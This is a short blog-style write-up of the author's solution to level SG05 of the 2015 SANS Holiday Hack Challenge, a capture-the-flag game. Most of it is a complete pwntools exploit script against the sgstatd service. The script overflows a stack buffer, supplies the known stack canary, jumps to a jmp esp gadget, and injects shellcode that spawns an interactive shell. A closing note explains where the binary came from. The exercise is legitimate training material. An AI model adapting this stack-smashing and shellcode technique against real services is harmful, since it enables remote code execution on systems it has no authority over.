2015 SANS Holiday Hack Challenge is a intro hacking game that ran Christmas 2015. The 5th challenge involved involved was best solved using binjitsu which is a library for exploit development.
Here’s my solution for SG05:
| from pwn import * | |
| canary = p32(0xe4ffffe4) | |
| jmpesp = p32(0x0804936b) | |
| command = 'whoami; ls; pwd;' | |
| r = remote('localhost', 4242) | |
| r.recv() | |
| r.sendline('X') | |
| r.recvuntil('protected!\n') | |
| r.recv() | |
| payload = '' | |
| payload += 'A' * cyclic_find('bbaa') | |
| payload += canary | |
| payload += 'B' * cyclic_find('baaa') | |
| payload += jmpesp | |
| payload += asm(shellcraft.alarm(0)) | |
| payload += asm(shellcraft.findpeersh()) | |
| log.info('sending shellcode') | |
| r.sendline(payload) | |
| r.interactive() |
A couple of notes.
sgstatd was available on SG01, which made the task easier.sgstatd was given in the firmware. (Even thought eh majority of the firmware was ARM, the provided sgstatd was compiled for 32-bit X86.)